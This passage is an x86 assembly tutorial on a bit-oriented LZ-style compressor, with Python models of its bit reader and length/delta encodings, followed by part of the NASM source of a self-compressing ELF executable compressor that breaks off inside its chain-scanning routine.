And this is how get_next_bit is used:
;-----
mov esi,control_bits_offset
mov edi,place_for_store_decompressed_bytes
cld
mov dl,80h
B0: call get_next_bit
jc L1
L0: ... some decompress instructions ...
jmp B0
L1: ... some decompress instructions ...
jmp B0
get_next_bit:
add dl,dl ; put the next bit into Carry: the highest bit
; becomes the Carry Flag and all lower bits
; are shifted left by 1
jnz no_new_byte
; the next 3 instructions run once all control_bits have been used up
lodsb ; load new control_byte with 8 control_bits
xchg edx,eax ; only moves it to another register
adc dl,dl ; put highest control_bit to Carry,
; shift all bits left by 1, and
; recycle the bit=1 set up by MOV DL,80h
; (it comes back in as the lowest bit, bit 0.)
no_new_byte:
ret
;-----
A note about two instructions: MOV DL,80h and ADC DL,DL.
MOV DL,80h sets up the first control_bit, but this isn't a true control_bit
used to switch decompression between L0 and L1. In binary, 80h = 10000000b:
the highest bit (bit 7.) of 80h is 1 and all other bits (bits 6. 5. 4. 3. 2.
1. 0.) are 0. This highest bit can be called the helper_control_bit. The
helper_control_bit is never destroyed until the decompression process ends.
It is recycled by the instruction ADC DL,DL each time all of the loaded bits
(8 bits by LODSB, 32 by LODSD) have been used, i.e. after 8 calls of
get_next_bit with LODSB (1st example procedure) or 32 calls of get_next_bit
with LODSD (3rd example procedure).
The first call of get_next_bit and a call of get_next_bit after all
control_bits have been used and removed look alike:
Status is: DL register = 80h = 10000000b
Here is how the instructions run:
1. ADD DL,DL
80h + 80h = 00h CarryFlag=1 ZeroFlag=1 (the helper_control_bit is in Carry)
2. LODSB
loads a control_byte with 8 control_bits; this instruction doesn't touch
Carry
3. XCHG EDX,EAX
moves the control_byte to the DL register; this instruction doesn't touch
Carry (note that instructions PUSH, POP, MOV, XCHG, INC, LODSB,... don't
change Carry)
4. ADC DL,DL
recycles the helper_control_bit, shifts all bits left by 1, and the new
highest control_bit goes to Carry
This may be the most difficult part of decompression to understand. OK,
next...
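Because the sentinel trick is easier to see in slow motion, here is a Python
model of the byte-wide get_next_bit. The class name BitReader and its
attribute names are inventions of this sketch; dl plays the role of the DL
register and pos the role of ESI.

```python
class BitReader:
    """Model of get_next_bit with an 8-bit control register (DL)."""

    def __init__(self, data):
        self.data = data
        self.pos = 0        # plays the role of ESI
        self.dl = 0x80      # MOV DL,80h: helper bit only, no control bits

    def get_next_bit(self):
        total = self.dl + self.dl            # ADD DL,DL
        carry = total >> 8
        self.dl = total & 0xFF
        if self.dl == 0:                     # only the helper bit was left
            byte = self.data[self.pos]       # LODSB
            self.pos += 1
            total = byte + byte + carry      # ADC DL,DL (carry = helper bit)
            carry = total >> 8
            self.dl = total & 0xFF
        return carry


reader = BitReader(bytes([0xA5]))
print([reader.get_next_bit() for _ in range(8)])
```

The helper bit travels through DL behind the real control bits, so DL only
becomes zero at the moment the last real bit has been handed out.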
The instructions at L0 and L1 can be:
L0: MOVSB
JMP B0
L1: ... calculate ECX
... calculate EBX (delta, shift)
PUSH ESI
MOV ESI,EDI
SUB ESI,EBX
REPZ MOVSB
POP ESI
JMP B0
The first mode, L0, isn't a true decompression mode. The byte isn't
compressed and is only moved. This mode has a bad pack ratio, but it must be
used to store bytes that can't be packed by L1 mode. It uses 1 byte + 1 bit
= 9 bits to store 1 byte = 8 bits.
The second mode, L1, is the true decompression mode. It calculates ECX, the
number of bytes to decompress, and EBX, a value that can be called DELTA or
SHIFT. This assumes that the same chain of ECX bytes sits at positions [EDI]
and [EDI-EBX] in the data bytes, so that ASM code like:
MOV ESI,EDI
SUB ESI,EBX
REPZ CMPSB
run over the data bytes during compression returns with ZeroFlag=1 and
ECX=0.
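Both sides of the L1 mode can be sketched in Python. copy_match models the
decompressor's MOV ESI,EDI / SUB ESI,EBX / REPZ MOVSB, and match_length
models the REPZ CMPSB test a compressor could use to find ECX for a given
delta. Both names, and the limit parameter, are assumptions of this sketch
rather than part of the original packer.

```python
def copy_match(out, delta, count):
    """Append count bytes copied from delta bytes back in out (a bytearray)."""
    if not 0 < delta <= len(out):
        raise ValueError("delta points outside the data decoded so far")
    for _ in range(count):
        out.append(out[-delta])    # byte by byte, so overlapping copies work
    return out


def match_length(data, pos, delta, limit):
    """How many bytes at data[pos:] repeat the bytes delta positions back."""
    n = 0
    while (n < limit and pos + n < len(data)
           and data[pos + n] == data[pos + n - delta]):
        n += 1
    return n


print(copy_match(bytearray(b"abc"), 3, 6))
print(match_length(b"abcabcabx", 3, 3, 100))
```

Copying one byte at a time matters: with a delta smaller than the count, the
copy reads bytes it has only just written, which is how a short pattern
expands into a long run.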
It has a good pack ratio, better for long chains (big ECX) and small shifts
(small EBX). The methods for calculating ECX and EBX are similar:
Clearly neither ECX nor EBX is zero (ECX<>0 EBX<>0), hence the highest
significant bit of the register is always 1.
The first instruction for calculating ECX sets up this highest bit=1, and
all following bits are supplied by calling get_next_bit. The first
instruction is:
MOV ECX,1
or INC ECX if ECX=0.
The next instructions are:
CALL GET_NEXT_BIT
ADC ECX,ECX ; RCL ECX,1 can be used as well
How is the calculation of ECX terminated? Again by calling get_next_bit!
Here is the full routine for calculating ECX in decompression:
MOV ECX,1
LCC0: CALL GET_NEXT_BIT
ADC ECX,ECX
CALL GET_NEXT_BIT
JC LCC0
The minimal value this code can produce is ECX=2. ECX=1 isn't needed because
that case is handled by L0 mode (MOVSB), and L0 is a more rational way
(though with a bad pack ratio) to pack 1 byte than L1 mode.
The bits come in pairs: one bit that is shifted into ECX, then one bit that
says whether another pair follows (1) or not (0).
Example: calculate ECX=5=101b
The highest bit is supplied by INC ECX, so I remove it - binary 01b
The bit sequence for calculating ECX=5 is 01 10 binary.
Calculate ECX=110100b
Remove the highest bit (this bit is supplied by INC ECX in decompression) -
binary 10100b
The bit sequence for calculating ECX is 11 01 11 01 00 binary.
Calculate ECX=2=10b. Bit sequence is 0 0 binary.
Calculate ECX=3=11b. Bit sequence is 1 0 binary.
Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary.
Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary.
Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary.
Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary.
Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary.
Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary.
Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary.
Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary.
Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary.
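The bit sequences listed above can be checked with a small model. What
follows is only a sketch in Python, used here so that it runs anywhere (the
decompressor itself stays in ASM). The names encode_count and decode_count
are made up for this illustration and do not appear in the source.

```python
def encode_count(n):
    """Return the bit list that the decoder loop turns back into n (n >= 2)."""
    if n < 2:
        raise ValueError("the loop cannot produce values below 2")
    payload = bin(n)[3:]              # binary digits of n without the leading 1
    bits = []
    for i, digit in enumerate(payload):
        bits.append(int(digit))       # data bit, consumed by ADC ECX,ECX
        # control bit: 1 = loop again (JC LCC0 taken), 0 = stop
        bits.append(1 if i < len(payload) - 1 else 0)
    return bits


def decode_count(bits):
    """Mirror of: MOV ECX,1 / LCC0: get bit, ADC ECX,ECX / get bit, JC LCC0."""
    it = iter(bits)
    ecx = 1
    while True:
        ecx = ecx * 2 + next(it)      # ADC ECX,ECX shifts the data bit in
        if next(it) == 0:             # control bit clear: leave the loop
            return ecx
```

Every value costs two bits per binary digit below the leading 1, which is why
short chains are cheap and long chains grow slowly.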
Calculating EBX shares some of these steps but adds some others.
EBX can be as small as EBX=1, which can be done as:
MOV EBX,1
LCD0: CALL GET_NEXT_BIT
ADC EBX,EBX
CALL GET_NEXT_BIT
JC LCD0
DEC EBX
But by experiments, EBX>16 is the common case, and for EBX<16 another
decompress mode can be used. Calculating EBX=15 requires 8 bits = 1 byte with
the code above.
It's better to use 8 bits = 1 byte to fill BL in EBX directly and to calculate
only the bits above BL ( bits 31 - 8 ) in the same way as ECX.
Here it is:
MOV EBX,1
LCD0: CALL GET_NEXT_BIT
ADC EBX,EBX
CALL GET_NEXT_BIT
JC LCD0
DEC EBX
DEC EBX
SHL EBX,8
MOV BL,byte [ESI]
INC ESI
Note that DEC EBX must be used at least 2 times to make EBX=0 possible
before SHL EBX,8 shifts all bits higher and frees BL.
There is also a mode named without_change_delta. Its principle is to use
DEC EBX 3 times after calculating EBX=2. The resulting EBX=-1 indicates that
calculating a new delta isn't needed and the old delta can be used. The old
delta can be saved to an unused register or to the stack by the previous
SUB ESI,EBX REPZ MOVSB and restored by the without_change_delta mode.
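The delta handling described above can be sketched as follows. This is an
illustrative Python model, not code from the source: the function names are
hypothetical, v stands for the value (2 or more) that the bit loop leaves in
EBX, and the three-DEC variant with without_change_delta is assumed.

```python
def decode_delta(v, low_byte, last_delta):
    """Turn the bit-loop value v (>= 2) and the BL byte into a delta."""
    ebx = v - 3                       # three times DEC EBX
    if ebx == -1:                     # v == 2: without_change_delta
        return last_delta             # no BL byte is read in this case
    return (ebx << 8) | low_byte      # SHL EBX,8 then MOV BL,[ESI]


def encode_delta(delta, last_delta):
    """Return (v, low_byte); low_byte is None when the old delta is reused."""
    if delta == last_delta:
        return 2, None
    return (delta >> 8) + 3, delta & 0xFF
```

For example, a delta of 500h is sent as v=8 followed by the byte 00h, while a
repeated delta costs only the value v=2 and no byte at all.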
Principle of the mode for packing 2-3 bytes with a delta from 1 to 7Fh:
1. Load 1 byte = 8 bits
2. bit 0 = 1 indicates 2 packed bytes
bit 0 = 0 indicates 3 packed bytes
3. the high 7 bits ( bits 7 - 1 ) are the delta
Here is a code example:
XOR EBX,EBX ; (EBX=0)
MOV ECX,1 ; (ECX=1)
MOV BL,[ESI]
INC ESI
SHR BL,1 ; this moves bit 0 to CF and shifts bits to make EBX=delta
SBB CL,0
INC ECX
INC ECX
Clearly a result of BL=0 after this code is an impossible delta. I make use
of this to TERMINATE the decompress process.
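As a rough model of this one-byte format (a Python sketch only; the helper
names encode_short and decode_short are invented here for illustration):

```python
def encode_short(count, delta):
    """Pack a 2- or 3-byte chain with delta 1..7Fh into one byte."""
    if count not in (2, 3) or not 1 <= delta <= 0x7F:
        raise ValueError("this mode packs 2-3 bytes with delta 1..7Fh only")
    return (delta << 1) | (1 if count == 2 else 0)


def decode_short(byte):
    """Return (count, delta), or None for the terminator (delta == 0)."""
    carry = byte & 1                  # SHR BL,1 moves bit 0 into CF
    delta = byte >> 1                 # the remaining 7 bits are the delta
    count = (1 - carry) + 2           # SBB CL,0 ; INC ECX ; INC ECX
    if delta == 0:
        return None                   # impossible delta: end of packed data
    return count, delta
```

decode_short(0) returns None, which corresponds to the TERMINATE case above.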
A nice idea for packing 1 byte with a delta from 1 to 15:
XOR EBX,EBX
MOV ECX,1
MOV BL,00010000b ; marker bit, shifted out after 4 bits
U02: CALL GET_NEXT_BIT
ADC BL,BL
JNC U02
A result of EBX=0 is an impossible delta and is used for packing the byte 00h.
This byte 00h is the most frequent byte in 32-bit opcodes. The code above
continues...
JNZ STORE_1_BYTE
XCHG EBX,EAX ; make EAX=0 in 1 byte 32-bit opcode
JMP STORE_BYTE
...
STORE_1_BYTE:
NEG EBX
MOV AL,[EDI+EBX]
STORE_BYTE:
STOSB
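The same step can be modelled in a few lines. This is only a sketch in
Python under the assumptions stated in the text (four bits, most significant
first, delta 0 meaning the byte 00h); decode_one_byte is a hypothetical name
and out stands for the already decompressed data in front of EDI.

```python
def decode_one_byte(bits4, out):
    """Consume four bits and append one byte to the bytearray out."""
    if len(bits4) != 4:
        raise ValueError("this mode always reads exactly 4 bits")
    delta = 0
    for bit in bits4:                 # four ADC BL,BL steps
        delta = delta * 2 + bit
    if delta == 0:
        out.append(0x00)              # impossible delta: store the byte 00h
    else:
        out.append(out[-delta])       # NEG EBX ; MOV AL,[EDI+EBX] ; STOSB
    return delta
```

Together with the 3 bits that select this mode, one byte is packed in 7 bits
instead of the 9 bits of the MOVSB mode.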
That is all for the decompress intro. One part is not implemented in the
decompressor yet. It is a part like:
CMP EBX,7D00h
JNC ZVYS_O_DVE
CMP EBX,500h
JNC ZVYS_O_JENNU
JMP NYST_NEZVYSUJ
ZVYS_O_DVE: INC ECX
ZVYS_O_JENNU: INC ECX
NYST_NEZVYSUJ:
It's not rational to compress 2 bytes with delta > 4FFh because this requires
2+(3*2)+8+2 = 18 bits, and the same can be done by using the MOVSB mode 2
times (2*9=18 bits).
U00: movsb ; require 1 byte = 8 bits
call get_next_bit ; require 1 bit
jnc U00
It's rational to compress 4 bytes with delta > 7CFFh because this requires
2+(7*2)+8+(2*2) = 28 bits without, and 26 bits with, this implementation.
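The bit counts quoted above can be recomputed with a short model. This is a
sketch in Python that follows the formula used by bitreq_02 in the listing
for the general chain mode (deltas above 7Fh); the names bsr, chain_bits and
LITERAL_BITS are chosen for this illustration only, and the adjust flag
models the part that is not implemented yet.

```python
LITERAL_BITS = 9                      # MOVSB mode: 1 byte + 1 control bit


def bsr(x):
    """Index of the highest set bit, like the BSR instruction."""
    return x.bit_length() - 1


def chain_bits(count, delta, adjust=False):
    """Bits needed to pack a chain: 2 mode bits, delta, BL byte, count."""
    if adjust:                        # store the count reduced by 1 or 2
        if delta >= 0x7D00:
            count -= 2
        elif delta >= 0x500:
            count -= 1
    return 2 + 2 * bsr((delta >> 8) + 3) + 8 + 2 * bsr(count)
```

chain_bits(2, 0x500) gives 18, the same as 2 * LITERAL_BITS, so nothing is
gained by packing such a chain.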
Intro for COMPRESS...
---------------------
Some equivalents:
DECOMPRESS            COMPRESS
MOV DL,80h            CALL o_C_0 ; setup helper_control_bit
CALL GET_NEXT_BIT     CALL PUT_BIT
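To make the decompress column concrete, here is a sketch of how
GET_NEXT_BIT behaves, modelled in Python after the routine at label U13 in
the listing (ADD DL,DL / JNZ / LODSB / XCHG EDX,EAX / ADC DL,DL). The class
and attribute names are assumptions made for this illustration.

```python
class BitReader:
    """Model of MOV DL,80h followed by repeated CALL GET_NEXT_BIT."""

    def __init__(self, data, pos=0):
        self.data = data              # packed stream, control and data bytes
        self.pos = pos                # plays the role of ESI
        self.dl = 0x80                # MOV DL,80h: only the marker bit is set

    def get_next_bit(self):
        total = self.dl + self.dl     # ADD DL,DL
        carry, self.dl = total >> 8, total & 0xFF
        if self.dl == 0:              # marker shifted out: load a new byte
            byte = self.data[self.pos]        # LODSB
            self.pos += 1
            total = byte + byte + carry       # ADC DL,DL, marker goes to bit 0
            carry, self.dl = total >> 8, total & 0xFF
        return carry
```

The control bits come out highest bit first, and a new control byte is
fetched only when the next bit is actually requested.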
The routines for scanning chains, calculating the bits required to pack a
chain, packing a chain, and some optimizations for finding better chains are
in the source code.
The source is an ELF compressor, but it isn't a universal ELF compressor. It
supports only the ELF header included in the source. This header is enough
for LINUX NASM use. You can download the sources as well as the binaries from:
http://feryno.home.sk/projects/compressELF.tar.gz
; ----- CUT HERE -----
; fy1ename: a00.asm
; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e
; Au~tchor: ch lap aj Feryno
; kompy1e:
; nasm -f bin a00.asm
; chmod +x a00
; example of use
; ./a00 a00 compressed_a00
; this self compress compressor
BITS 32
org 08048000h
ehdr: ; Elf32_Ehdr
db 7Fh, 'ELF', 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd START ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
phdr: ; Elf32_Phdr
dw 1 ; e_phnum ; p_type
dw 0 ; e_shentsize
dw 0 ; e_shnum ; p_offset
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd memsize ; p_memsz
dd 111b ; p_flags
; EWR
;Exec,Write,Read
dd 1000h ; p_align
phdrsize equ $ - phdr
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
START:
pop ebx ; pop number of strings in comand line , must be =3
dec ebx
dec ebx
dec ebx ; set zero flag if after this EBX=0
pop ebx ; offset of first string ( executable file )
jz short mode ; number of strings = 3 = executable + file0 + file1
use: mov ecx,usage
xor edx,edx
mov dl,usagesize
;;; call WS
jmp short ex00
mode: pop ebx ; pop offset of second string (first string, 0,
; second string, 0, third...)
open: mov edi,f0h
cld
; ebx is now pointed to second string in a shell = in_file
open_f: xor ecx,ecx ; open flags, open for read-only
; xor eax,eax
; mov al,5 ; sys_open
db 6Ah,5 ; push dword 5
pop eax
int 80h ; open , note - return HANDLE in EAX
or eax,eax
jns short OK_open
mov ecx,MEOF
; xor edx,edx
; mov dl,MEOFS
db 6Ah,MEOFS ; push dword MEOFS
pop edx
;;; call WS
ex00: jmp short ex01
OK_open:stosd ; store file handle
pop ebx ; EBX pointed to second filename out_file
mov ecx,111101101b ; 111 owner can read, write, execute
; 101 group can read, execute / search, but not write
; 101 others, same as group
; xor eax,eax
; mov al,8 ; sys_creat
db 6Ah,8 ; push dword 8
pop eax
int 80h ; creat , note - return HANDLE in EAX
or eax,eax
jns short OK_creat
mov ecx,MECF
; xor edx,edx
; mov dl,MECFS
db 6Ah,MECFS ; push dword MECFS
pop edx
;;; call WS
ex01: jmp short ex02
OK_creat:stosd ; store file handle
; EDI=f0s
mov ebx,dword [edi - 4*2] ; handle for in_file
xor ecx,ecx ; ECX=0 seek 0 bytes
; xor edx,edx
; inc edx
; inc edx ; EDX=2 seek to end of file + ECX=0 bytes
db 6Ah,2 ; push dword 2
pop edx
; xor eax,eax
; mov al,13h ; sys_seek
db 6Ah,19 ; push dword 19
pop eax
int 80h ; note - return filesize in EAX
or eax,eax
jns short OK_seek_to_end
mov ecx,MSEEF
; xor edx,edx
; mov dl,MSEEFS
push byte MSEEFS
pop edx
;;; call WS
ex02: jmp short ex03
OK_seek_to_end:
;;; or eax,eax
;;; jz ex04 ; filesize=0 -> this file needn't compression
cmp eax,f0b_size
jnbe ex04 ; LIMIT f0b_size OVERFLOW !!!!!!
cmp eax,4Ch
jbe ex04 ; can't be a ELF executable, ELF header require 4C
; bytes
stosd ; store in_file size to f0s_2
stosd ; store in_file size to f0s
push eax ; and push it to stack
xor ecx,ecx ; seek 0 bytes
xor edx,edx ; seek to begin of file + ECX=0 bytes
; xor eax,eax
; mov al,13h
db 6Ah,19 ; push dword 19
pop eax
int 80h
or eax,eax
jns short OK_seek_to_begin
mov ecx,MSEBF
; xor edx,edx
; mov dl,MSEBFS
db 6Ah,MSEBFS ; push dword MSEBFS
pop edx
;;; call WS
ex03: jmp short wsex04
OK_seek_to_begin:
mov esi,fy1eObuffer
mov edi,f1b
read_f: mov ecx,esi
pop edx ; pop in_file_size from stack
; xor eax,eax
; mov al,3 ; sys_read
db 6Ah,3 ; push dword 3
pop eax
int 80h ; note - return in EAX number of bytes read
; (negative value if error)
cmp eax,edx
jz short OK_read
oops: mov ecx,MERF
; xor edx,edx
; mov dl,MERFS
db 6Ah,MERFS ; push dword MERFS
pop edx
wsex04: call WS
ex04: jmp long ex05 ;short ex05
OK_read:
add eax,esi
mov dword [konyc_dat],eax
; mov ecx,4Ch ; header size
db 6Ah,4Ch ; push dword 4Ch
pop ecx
sub dword [f0s],ecx
repz movsb
push esi
mov esi,uncompress_routine
mov cl,uncompress_routine_size
repz movsb
pop esi
; all self compressing is below this:
movsb ; first byte, store it, this byte can't be compressed
call o_C_0 ; setup [position] and byte on [position]
dec dword [f0s]
jz near terminate002
; xor eax,eax
; mov dword [last_delta],eax ; I know : all data in UDATASEG is zero
; ; but use dirty tricks and must be sure
; ; dword [last_delta] can be non zero if
; ; compressed fy1e overwrite
; ; [last_delta] but i hope that
; ; compressed will be smaller as
; ; original executable
call progress
compress002:
call scan002
; some optimalizations for found better chain as chain by scan0002
cmp eax,1
jbe near cant_optimize_002_L0
; on ESI is EAX lenght chain
; explore if on SI isn't chain with no change delta - if it's use this chain
call scanincd ; include procedure in scan_ncd.inc
jc cant_optimize_002_L1
mov ebx,dword [last_delta]
; pack without change delta has superior pack priority (the best pack ratio)
jmp near A08_new_optimalization
cant_optimize_002_L1:
xchg dword [last_delta],ebx
push ebx
push eax
push esi
add esi,eax
stc
cmp dword [konyc_dat],esi
jz chumaj
inc esi
cmp dword [konyc_dat],esi
jz chumaj
call scan002
call scanincd
chumaj: pop esi
pop eax
pop ebx
xchg dword [last_delta],ebx
jnc near cant_optimize_002_L0
skus_toto_L0:
push ebx
push eax
inc esi
call scan002
call scanincd
dec esi ; DEC don't change Carry !!!
xchg ecx,eax ; number of bytes to ECX
; XCHG don't change Carry !!!
pop eax ; POP don't change Carry !!!
pop ebx
jc try_next_optimalization
; use chain without change delta require less bits for pack ?
call bitreq_02
push edx ; number of bits for pack non-optimized chain
xchg ecx,eax ; number of bytes of non-optimized chain -> CX
; number of bytes of chain without change delta -> AX
push ebx
mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02
call bitreq_02 ; return EDX = number of bits for pack chain
; without change delta
pop ebx
push edx
push eax
xor eax,eax ; simulate pack 1 byte first ( before chain
; without change delta )
call bitreq_02
pop eax
add dword [esp+0*4],edx
pop edx
xchg ecx,eax ; restore EAX = number of bytes of
; non-optimized chain
inc ecx ; number of bytes for pack optimized chain
cmp eax,ecx
pop ecx ; number of bits for pack non-optimized chain
jc near pack_1_byte_look_better
cmp edx,ecx
jc near pack_1_byte_look_better
try_next_optimalization:
cmp eax,3
jc try_old_optimalization
push ebx
push eax
inc esi
inc esi
call scan002
call scanincd
dec esi
dec esi
xchg ecx,eax ; number of bytes to ECX
; XCHG don't change Carry !!!
pop eax ; POP don't change Carry !!!
pop ebx
jc try_old_optimalization
; use chain without change delta require less bits for pack ?
call bitreq_02
push edx ; number of bits for pack non-optimized chain
xchg ecx,eax ; number of bytes of non-optimized chain -> CX
; number of bytes of chain without change delta -> AX
push ebx
mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02
call bitreq_02 ; return EDX = number of bits for pack chain
; without change delta
pop ebx
push edx
push eax
xor eax,eax ; simulate pack 1 byte first ( before chain
; without change delta )
call bitreq_02
pop eax
add dword [esp+0*4],edx
pop edx
xchg ecx,eax ; restore EAX = number of bytes of
; non-optimized chain
inc ecx
inc ecx ; number of bytes for pack optimized chain
cmp eax,ecx
pop ecx ; number of bits for pack non-optimized chain
jc near pack_1_byte_look_better
cmp edx,ecx
jc near pack_1_byte_look_better
try_old_optimalization:
push esi
add esi,eax
cmp dword [konyc_dat],esi
pop esi
jz near L_NO_0
call bitreq_02
push ebx
push eax
push edx
push eax
push esi
add esi,eax
call scan002
call bitreq_02
pop esi
add dword [esp+0*4],eax
add dword [esp+1*4],edx
xor eax,eax
call bitreq_02
push edx
inc esi
call scan002
call bitreq_02
dec esi
add dword [esp+0*4],edx
pop edx ; EDX=bits required by pack 1 byte first
inc eax ; EAX=bytes packed in 2 steps , pack 1 byte
; first
cmp dword [esp+0*4],eax
jc obnov_to
;;; clc
jnz obnov_to
cmp edx,dword [esp+1*4]
obnov_to:
pop eax
pop edx
pop eax
pop ebx
jc near pack_1_byte_look_better
A08_new_optimalization:
cmp eax,3
jc near can_t_use_new_optimalization_08
push esi
add esi,eax
inc esi
inc esi
inc esi ; scanning this close to the end of data is a bad idea:
; it isn't useful to try the code marked
; DANGEROUS for the last 3 bytes because this can
; be unstable (data in f0b overlap)
cmp dword [konyc_dat],esi
pop esi
jbe this_is_it
xchg dword [last_delta],ebx
push ebx
push eax
push esi
add esi,eax
inc esi ; DANGEROUS , ESI+1
call scan002
call scanincd ; DANGEROUS , must be ESI + 1 + EAX (where
; EAX > 1)
pop esi ; POP instruction doesn't change Carry (=CF) !!!
pop eax ; POP instruction doesn't change Carry (=CF) !!!
pop ebx
xchg dword [last_delta],ebx ; XCHG instruction doesn't change Carry
; (=CF) !!!
jnc can_t_use_new_optimalization_08
this_is_it:
push ebx
push eax
push edx ;db 6Ah,0 ; push dword 0 ; bits count=0 but will
; be overwritten first time because
; chain > 0 bytes will be found
db 6Ah,0 ; push dword 0 ; chain lenght counter
new_optimalization_08_L0:
call scan_lim ; scan EAX chain lenght, return min.
; EBX
call scanincd
jc new_optimalization_08_L1
mov ebx,dword [last_delta]
new_optimalization_08_L1:
call bitreq_02
push edx
push eax
push esi
xchg dword [last_delta],ebx
push ebx
add esi,eax
call scan002
call bitreq_02
pop ebx
xchg dword [last_delta],ebx
pop esi
add eax,dword [esp+0*4]
xchg ecx,eax
pop eax
add dword [esp+0*4],edx
pop edx
cmp dword [esp+0*4],ecx
jc toto_bude_asy_lepseeeee
jnz toto_bude_asy_horse
cmp dword [esp+1*4],edx
jbe toto_bude_asy_horse
toto_bude_asy_lepseeeee:
; mov dword [esp+2*4],ax
; mov dword [esp+3*4],bx
; mov dword [esp+0*4],cx
; mov dword [esp+1*4],dx
add esp, byte 4*4
push ebx
push eax
push edx
push ecx
toto_bude_asy_horse:
dec eax
cmp eax,1
jnz new_optimalization_08_L0
pop eax
pop eax
pop eax
pop ebx
can_t_use_new_optimalization_08:
L_NO_0:
cmp eax,9 ; under 32 bit opcodes it's enough for 1 MB
; data block
; 16 bit delta is less than 64 kB and requires
; max. 4 bytes for calculate it
; Summa: Under DOS it's enough to use CMP AX,4
; because small value is fast algorithm
; Under 32 bit OS ( Linux, NT 4.0 ) use
; big value if big data block
; 9 is enough for 4 GB of data block
; Who can produce 4 GB of ASM code ???
jnc cant_optimize_002_L0
; i have chain with AX <2,0Fh> and try pack 1 byte AX times
push eax
db 6Ah,0 ;push 0000h ; bits require counter
push eax ; pack 1 byte AX times
optimize_002_L2:
xor eax,eax
call bitreq_02 ; include procedure in bitreq02.inc
inc esi
add dword [esp+1*4],edx ; bits require counter
dec dword [esp+0*4] ; pack 1 byte EAX times
jnz optimize_002_L2 ; simulate pack 1 byte EAX times
pop eax ; remove word from stack only
pop ecx ; ECX = required bits count for pack 1 byte
; EAX times
pop eax ; restore EAX
sub esi,eax ; restore ESI
call bitreq_02 ; explore once-pack EAX bytes EBX delta bits
; count
; return EDX=bits required
cmp edx,ecx
jc cant_optimize_002_L0
; use JC for prefer pack 1 byte EAX times
; use JBE for prefer once-pack EAX bytes with delta = EBX
; JC is sometimes better because pack 1 byte don't change delta and it's
; possibility pack without change delta ( call scanincd ) later
; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but
; this depend on data structure and sometimes JBE can be more rational if
; change delta and later pack with this new delta without change delta
; O.K. pack 1 byte now
pack_1_byte_look_better:
xor eax,eax
; now will be packed last 1 byte by call pack002 in a00.asm
; EAX=0
cant_optimize_002_L0:
call pack002
add esi,eax
sub dword [f0s],eax
pushfd
call progress
popfd
jnz near compress002 ; jnz don't handle error if packing
; more bytes as bytes in f0buffer
; jnbe is better
mov ecx,progress_text
xor edx,edx
inc edx
mov byte [ecx],0Ah
call WS
terminate002:
call putbit1
call putbit1
xor eax,eax
stosb
mov ebx,dword [position]
stc
rcl byte [ebx],1
jc done_002
flush: shl byte [ebx],1
jnc flush ; shift all control_bits and remove
; highest ( highest was put in MOV BYTE
; PTR DS:[DI],1 , INC DI )
done_002:
after_compress:
; modifying data for fill pointer registers in output file
; calculate boundary of moved data
mov ecx,f1b
mov eax,edi
sub eax,f1b - 08048000h + 1
mov dword [ecx+4Fh],eax ; esi value
mov eax,edi
sub eax,f1b+4Ch+fuyi - 08048000h + 1
add eax,dword [ecx+40h]
mov dword [ecx+54h],eax ; edi value
; calculate size of moved data
mov eax,edi
sub eax,f1b+4Ch+fuyi
mov dword [ecx+59h],eax ; ecx value
; calculate offset after uncompress_routine (esi)
mov eax,dword [ecx+40h]
add eax,08048000h + uncompress_routine_end - uncompress_moved
mov dword [ecx+69h],eax ; esi value
; calculate offset of moved U13 (ebp)
sub eax, byte (uncompress_routine_end - U13)
mov dword [ecx+6Eh],eax ; ebp value
; calculate JUMP
mov eax,dword [ecx+18h]
sub eax,dword [ecx+40h]
sub eax,08048000h + uncompress_routine_end - uncompress_moved
mov dword [f1b+0D9h],eax ;[ecx+0D9h],eax
; modify data in a header
mov dword [ecx+18h],0804804Ch ; START
mov eax,edi
; ECX=f1b
sub eax,ecx ; sub eax,f1b
mov dword [ecx+3Ch],eax ; filesize
sub eax, byte ( fuyi + 4Ch + 1 )
add dword [ecx+40h],eax ; memorysize
mov byte [ecx+44h],111b ; Exec,Write,Read
; O.K. going write output...
mov ebx,dword [f1h]
; ECX=f1b
;;; mov ecx,f1b
mov edx,edi
sub edx,ecx
; xor eax,eax
; mov al,4 ; sys_write
db 6Ah,4 ; push dword 4
pop eax
int 80h
cmp eax,edx
jz OK_write
mov ecx,MEWF
; xor edx,edx
; mov dl,MEWFS
db 6Ah,MEWFS ; push dword MEWFS
pop edx
call WS
ex05: jmp short exit
OK_write:
mov esi,f0h
lodsd
xchg ebx,eax
; xor eax,eax
; mov al,6 ; sys_close
db 6Ah,6 ; push dword 6
pop eax
int 80h
lodsd
xchg ebx,eax
; xor eax,eax
; mov al,6 ; sys_close
db 6Ah,6 ; push dword 6
pop eax
int 80h
exit:
xor ebx,ebx
; xor eax,eax
; inc eax
db 6Ah,1
pop eax ; this is better for compress as xor eax,eax inc eax
; sys_exit
int 80h
WS: xor ebx,ebx
inc ebx ; EBX=1 (STDOUT)
; xor eax,eax
; mov al,4 ; write
db 6Ah,4 ; push dword 4
pop eax
int 80h
ret
; -------
scan002:
; input: chain on ESI
; return: EAX max. lenght ( 0 or 1 for chain not found ) , EBX delta
push esi
push edi
xor edx,edx ; chain lenght counter
mov edi,f0b
mov ecx,esi
sub ecx,edi
lodsb
scan_L00:
jecxz scan_L04
repnz scasb
jnz scan_L04
